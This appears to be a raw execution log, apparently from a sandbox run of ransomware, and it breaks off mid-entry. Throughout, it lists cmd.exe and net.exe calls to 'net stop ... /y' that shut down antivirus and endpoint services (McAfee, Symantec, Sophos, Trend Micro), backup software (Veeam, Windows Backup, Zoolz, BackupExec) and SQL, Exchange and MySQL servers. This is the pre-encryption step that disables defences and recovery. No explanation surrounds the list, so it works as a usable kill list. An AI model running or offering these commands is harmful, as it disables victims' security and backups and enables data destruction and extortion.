cmd.exe /c net stop DCAgent /y
C:\Windows\SysWOW64\net.exe
net stop DCAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EPSecurityService /y
C:\Windows\SysWOW64\net.exe
net stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
net stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EraserSvc11710 /y
C:\Windows\SysWOW64\net.exe
net stop EraserSvc11710 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EsgShKernel /y
C:\Windows\SysWOW64\net.exe
net stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
net stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop IISAdmin /y
C:\Windows\SysWOW64\net.exe
net stop IISAdmin /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop IMAP4Svc /y
C:\Windows\SysWOW64\net.exe
net stop IMAP4Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop McShield /y
C:\Windows\SysWOW64\net.exe
net stop McShield /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop McTaskManager /y
C:\Windows\SysWOW64\net.exe
net stop McTaskManager /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfemms /y
C:\Windows\SysWOW64\net.exe
net stop mfemms /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfevtp /y
C:\Windows\SysWOW64\net.exe
net stop mfevtp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MMS /y
C:\Windows\SysWOW64\net.exe
net stop MMS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
net stop mozyprobackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
net stop MsDtsServer110 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeES /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeES /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeSA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSExchangeSRS /y
C:\Windows\SysWOW64\net.exe
net stop MSExchangeSRS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLSERVER /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MySQL57 /y
C:\Windows\SysWOW64\net.exe
net stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
net stop ntrtscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
net stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
net stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
net stop POP3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop RESvc /y
C:\Windows\SysWOW64\net.exe
net stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop sacsvr /y
C:\Windows\SysWOW64\net.exe
net stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SamSs /y
C:\Windows\SysWOW64\net.exe
net stop SamSs /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
net stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SAVService /y
C:\Windows\SysWOW64\net.exe
net stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
net stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
net stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
net stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop Smcinst /y
C:\Windows\SysWOW64\net.exe
net stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SmcService /y
C:\Windows\SysWOW64\net.exe
net stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
net stop SMTPSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
net stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
net stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
net stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLWriter /y
C:\Windows\SysWOW64\net.exe
net stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
net stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamMountSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamMountSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop W3Svc /y
C:\Windows\SysWOW64\net.exe
net stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop WRSVC /y
C:\Windows\SysWOW64\net.exe
net stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop swi_update /y
C:\Windows\SysWOW64\net.exe
net stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQL Backups" /y
C:\Windows\SysWOW64\net.exe
net stop "SQL Backups" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
